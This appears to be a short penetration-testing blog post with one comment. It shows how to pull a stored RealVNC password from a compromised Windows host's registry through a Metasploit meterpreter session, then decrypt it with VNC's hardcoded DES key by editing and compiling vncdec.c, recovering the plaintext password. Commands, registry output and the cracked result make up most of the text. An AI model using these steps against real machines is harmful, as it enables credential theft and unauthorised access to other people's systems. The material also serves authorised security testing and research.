inside your meterpreter shell run getvncpw
meterpreter > run getvncpw
[*] Searching for VNC Passwords in the registry....
[*] FOUND in HKLM\Software\RealVNC\WinVNC4 -=> 3290e903b5bf3769 =>
you're probably asking yourself what the F kind of password 3290e... is. Well its DES encrypted. Lucky for us the key is hardcoded (0x238210763578887) and since VNC is open source...
code here:
http://packetstormsecurity.org/files/view/10159/vncdec.
change the relevant section
/* put your password hash here in p[] */
char p[]={0x59,0x58,0x6e,0x10,0xa4,0x48,0xd3,0x80};
getvncpw spit out: 3290e903b5bf3769
char p[]={0x32,0x90,0xe9,0x03,0xb5,0xbf,0x37,0x69};
cg@segfault:~/pentest$ gcc vncdec.c -o vncdec
cg@segfault:~/pentest$ ./vncdec
demopass
or use this one
http://www.consume.org/~jshare/vncdec.c
where you can just put your hash on the command line and don't have to recompile every time.
I rewrote the script as a post module.
ReplyDeleteInfo here:
http://www.room362.com/blog/2011/3/20/metasploit-vnc-password-extraction.html
Commited as of r12048
https://www.metasploit.com/redmine/projects/framework/repository/revisions/12048